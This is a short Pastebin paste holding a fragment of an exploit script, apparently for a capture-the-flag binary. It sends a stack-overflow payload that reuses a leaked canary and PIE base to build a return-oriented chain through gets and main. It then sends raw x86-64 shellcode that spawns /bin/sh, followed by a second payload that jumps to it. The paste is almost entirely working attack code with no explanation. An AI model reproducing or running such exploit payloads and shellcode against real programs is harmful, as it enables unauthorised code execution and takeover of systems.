Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- pop_rdi_off = 0xda3
- main_off = 0xc00
- get_off = 0x908
- padding = 0x88
- payload = 'a'*padding + p64(canary) + 'aaaaaaaa' + p64(pie+pop_rdi_off) + p64(name) + p64(pie+get_off) + p64(pie+main_off)
- s_data(payload)
- m.recvuntil('>')
- m.sendline('4')
- sleep(1)
- sh = '\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
- m.sendline(sh)
- sleep(1)
- p2yload = 'a'*padding + p64(canary) + 'aaaaaaaa' + p64(name)
- s_data(p2yload)
- m.recvuntil('>')
- m.sendline('4')
Add Comment
Please, Sign In to add comment
